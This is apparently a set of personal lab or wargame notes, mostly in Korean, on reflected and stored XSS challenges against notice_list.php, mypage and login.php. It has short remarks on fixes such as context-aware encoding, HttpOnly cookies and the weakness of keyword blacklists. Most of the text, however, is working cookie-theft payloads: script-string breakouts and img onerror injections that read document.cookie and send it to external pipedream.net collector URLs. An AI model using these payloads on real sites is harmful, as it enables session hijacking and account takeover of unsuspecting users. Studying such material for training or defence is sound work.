XSS 1
notice_list.php
xss2
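notice_list.php의 search 파라미터 -> reflected XSS (아래 페이로드 형태로 보아 입력값이 스크립트 안의 문자열 리터럴에 이스케이프 없이 반영되는 것으로 추정. 대응: 출력 위치의 JavaScript 문자열 컨텍스트에 맞는 인코딩 적용, 세션 쿠키에 HttpOnly 설정 시 document.cookie로 읽히지 않음)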
');
let c = document.cookie;
console.log(c);
let i = new Image();
console.log(i);
i.src = "https://eot2jevtyijbm2l.m.pipedream.net/?cookie=" + c;
let tmp=('
xss3
notice_list.php의 search 부분은 HTML entity로 치환됨
mypage -> reflected XSS (mypage 출력에는 같은 치환이 적용되지 않은 것으로 보임. 입력이 반영되는 모든 출력 지점에 동일한 인코딩 필요)
<img src=. onerror='
let c=document.cookie;
let i=new Image();
i.src="https://eot2jevtyijbm2l.m.pipedream.net/?cookie="+c;'>
+ -> %2B ('+'의 URL 인코딩)
xss4
notice_list -> stored XSS
script, alert <- blacklist filtering (키워드 블랙리스트는 이벤트 핸들러 속성을 막지 못함: <img src=. onerror="prompt(1)">. 대응: 키워드 필터 대신 출력 시 HTML 인코딩 또는 허용 목록 기반 sanitize)
<img src=. onerror="
let cookie = document.cookie;
let img = new Image();
img.src = 'https://eot2jevtyijbm2l.m.pipedream.net/?cookie=' + cookie;
">
xss5
xss6
login.php
');
window.onload=function() {
let c=document.cookie;
let i=new Image();
i.src="https://eoxee0fw4m1u2sw.m.pipedream.net/?cookie="+c;
};
console.log('